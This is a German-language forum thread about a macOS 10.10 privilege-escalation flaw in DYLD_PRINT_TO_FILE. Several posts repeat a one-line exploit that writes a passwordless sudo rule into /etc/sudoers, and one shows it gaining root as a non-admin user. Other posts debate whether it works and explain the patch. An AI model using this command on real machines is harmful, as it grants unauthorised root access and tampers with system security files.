OSX exploit

  • was ist daran ein exploit?

    Erstens kann der Befehl unter osx gar nicht funktionieren da die Syntax nicht stimmt weil der "Depp" keine offensichtlich Ahnung von osx hat.
    Zweitens bräuchte der "Hacker" das Passwort des Benutzer wenn die Syntax korrigiert wäre.


    :edit

    Code
    1. echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
    2. bash: line 1: 3: Bad file descriptor
    3. Password:

    The post was edited 2 times, last by Moorviper ().

  • Hi,


    Moorviper
    ich weiß zwar den Grund nicht warum du gleich beleidigend wirst, aber der Befehl funktioniert. Und zwar ohne Passwort.


    Ab 10.10. kann somit jeder normale User Root werden.


    Mit freundlichen Grüßen
    Kris

  • Der Capitain ist sicher ;-)


    Code
    1. macbookpro:Desktop USERNAME$ echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
    2. bash: line 1: 3: Bad file descriptor
    3. Password:


    vdr-box

  • Hi,


    vdr-box
    seid wann hast DU einen Mac? :)


    Hier noch ein paar Infos von Heise
    http://www.heise.de/security/m…c-OS-X-10-10-2760786.html


    btw. habt Ihr aus dem Twitter nur kopiert? Das geht so nicht, weil nicht korrekt formatiert wird. Evtl klappt das so

    Code
    1. echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s


    Mit freundlichen Grüßen
    Kris

  • echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s



    Seit 2013 hab ich alles auf Mac OSX umgestellt.


    Und nein, dein Befehl geht unter El Captain auch nicht.


    ver-box

  • Der befehl geht bei mir weder auf yosemite noch El Capitan
    Gut vielleicht sind meine OS nur "kaputt" ;-)


    es ging auf keinem meiner 6 Mac's

  • ja
    10.11 hab ich nur auf meinem zuletzt gekauftem macbook


    die anderen 5 Rechner laufen mit 10.10.(3-5)


    bei keinem ging es


    aber es tauchen da immer mal wieder solche tolle hack's in Foren auf.
    bisher ging da nie einer ...

  • Direkt aus Twitter unter OS X 10.10.4 und Firefox herauskopiert:

    Code
    1. Mini:~ test$ echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
    2. bash-3.2#


    "test" als neuer Standardbenutzer ohne Adminrechte eingerichtet.

  • Wieso ohne Adminrechte? Vielleicht hat mir ja die mallorquinische Sonne das Hirn ausgebrannt, aber ich meine da ein sudo -s zu erkennen.


    Gerald


    HP Proliant MicroServer Gen8, Xeon E3-1230, 12 GB RAM, 3xWD red 2TB im RAID 5, 2xSundtek MediaTV Home DVB-C/T, L4M TWIN-C/T, Ubuntu Server 14.04.1, Plex Media Server
    Samsung UE55H6470

  • Wieso ohne Adminrechte?

    Weil der User eigentlich nicht sudo nutzen dürfen soll. Der Witz ist, dass man in den betroffenen Versionen von OS X mit DYLD_PRINT_TO_FILE trotz fehlender Admin-Rechte für den User in die /etc/sudoers (oder eine andere beliebige Datei) schreiben kann und dadurch die erfolgreiche Ausführung von sudo -s möglich wird.


    Hier wird das z.B. genauer erklärt: https://www.sektioneins.de/en/…ld_print_to_file_lpe.html

    yaVDR-Dokumentation (Ceterum censeo enchiridia esse lectitanda.)

  • Hi,




    Und nein, dein Befehl geht unter El Captain auch nicht.


    Sagt ja auch Heise

    Quote

    Das Sicherheitsproblem betrifft laut Esser OS X 10.10.4 sowie die Beta von 10.10.5. In den Vorabversionen von OS X 10.11 (El Capitan) hat Apple die Lücke bereits geschlossen.


    Mit freundlichen Grüßen
    kris